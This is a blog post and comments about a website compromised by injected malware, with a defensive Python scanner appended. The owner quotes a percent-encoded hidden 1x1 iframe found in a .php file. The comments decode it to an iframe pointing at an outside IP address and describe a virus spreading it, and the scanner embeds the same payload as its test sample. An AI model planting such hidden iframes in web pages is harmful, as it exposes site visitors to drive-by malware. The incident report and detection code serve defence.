Website security compromised
I noticed a drastic drop in visitors to my website in February and March and was wondering what was happening. On March 8, I suddenly received a notification email from the Google Search Quality team informing me that my website was a hazard to visitors and might contain malware or badware. I was shocked to learn about it. I Googled for my site and found that my site had been tagged “This site may harm your computer”, and visitors could not reach my website by following the link from the Google search page.
With the help of my hosting provider, I found a piece of malicious obfuscated JavaScript code that had been intentionally embedded into one of the .php files. Part of the obfuscated code read like this:
%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E
I removed the malicious code from my .php script file and informed the Google team. It took them quite some time to remove my website from their list. A moment ago, I found out that my site has been de-listed from Google’s list of malicious websites.
Ironically, today I received an announcement from my web hosting provider that they are implementing HackerSafe Certification on all websites hosted with them. Here’s a snapshot of their newsletter:

I am too tied up to carefully inspect and decipher the code. Any takers?
Comments
3 Responses to “Website security compromised”
%3C%69… seem to be simple hex values. Put them in a table and print them to find out the clear text form.
A python script example:
table = [ 0x3C, 0x69, 0x66, 0x72, 0x61, 0x6D, 0x65, 0x20, 0x73, 0x72, 0x63, 0x3D, 0x20, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x38, 0x31, 0x2E, 0x39, 0x35, 0x2E, 0x31, 0x34, 0x36, 0x2E, 0x39, 0x38, 0x2F, 0x69, 0x6E, 0x64, 0x65, 0x78, 0x2E, 0x68, 0x74, 0x6D, 0x6C, 0x20, 0x66, 0x72, 0x61, 0x6D, 0x65, 0x62, 0x6F, 0x72, 0x64, 0x65, 0x72, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x73, 0x63, 0x72, 0x6F, 0x6C, 0x6C, 0x69, 0x6E, 0x67, 0x3D, 0x22, 0x6E, 0x6F, 0x22, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x63, 0x6F, 0x75, 0x6E, 0x74, 0x65, 0x72, 0x3E, 0x3C, 0x2F, 0x69, 0x66, 0x72, 0x61, 0x6D, 0x65, 0x3E ]
html = ""
for a in table:
    # print each byte value with its character, then append it to the decoded string
    print("%d (%c)" % (a, chr(a)))
    html = html + chr(a)
print("HTML: %s" % html)
## end of script
(I hope your blog doesn’t mangle the formatting of the script too badly.)
tkoskine,
Thanks for the Python script. The obfuscated code, after deciphering, reads like this:
[iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter][/iframe]
I replaced the angle brackets with square brackets to prevent the browser from interpreting the entire line. I traced the IP address to Panama.
I faced the same problem in my own source code before, but we found that the intrusion came from a virus reaching the Linux servers via Samba from a Windows machine, as one of our people’s PCs had been infected with a virus called “熊貓燒香”. It attacked all the .php files in the folders he had open and added a line of iframe text to my PHP files.
When that source code is loaded, the page is automatically diverted to another website that is not my own, as the iframe contains JavaScript that asks the parent frame to redirect to another website.
A pretty bad experience ya..:)
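Both the decoded iframe above and the third comment describe the same pattern: a 1x1 iframe hidden inside a .php file behind percent-encoding. The scanner below is an added example (not code from the post or its commenters) that expands percent-encoded runs in a file, including double-encoded ones, and flags any iframe whose width or height is 0 or 1 pixel, which goes a little beyond the page by also catching literal, unencoded iframes. The sample file content, the JavaScript string-literal carrier around the encoded string, and the function names are constructed assumptions; the encoded string and the IP it decodes to are the ones quoted in the post.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Constructed sample of an infected .php file: the percent-encoded iframe quoted
# in the post, stored inside a JavaScript string literal (the carrier is assumed).
INFECTED_PHP = ("<?php echo 'hello'; ?>\n<script>var c='"
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35"
    "%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62"
    "%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68"
    "%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65"
    "%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E';</script>\n")

PCT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){6,}")          # runs of %XX bytes
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)   # iframe open tags
ATTR = re.compile(r'(\w+)\s*=\s*"?([^\s">]+)"?')          # attr=value pairs

def decode_layers(text, max_rounds=3):
    """Percent-decode repeatedly: injected strings are sometimes encoded twice."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def is_tiny(value):
    """True for the 0/1 pixel sizes used to keep an iframe out of sight."""
    return value.lower().rstrip("px") in ("0", "1")

def find_hidden_iframes(content):
    """Return (src, attrs) for each literal or percent-encoded iframe that is 0 or 1 px wide/high."""
    # Expand every percent-encoded run in place so the tag regex can see it.
    expanded = PCT_RUN.sub(lambda m: decode_layers(m.group(0)), content)
    findings = []
    for tag in IFRAME.finditer(expanded):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag.group(1))}
        if is_tiny(attrs.get("width", "")) or is_tiny(attrs.get("height", "")):
            findings.append((attrs.get("src", ""), attrs))
    return findings

def scan_tree(root):
    """Map each .php file under root that contains a hidden iframe to its hits."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = find_hidden_iframes(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report
```

Call `scan_tree("/path/to/docroot")` against a copy of the site to list affected files and the injected src values; `find_hidden_iframes(INFECTED_PHP)` reproduces the finding from the post's own string.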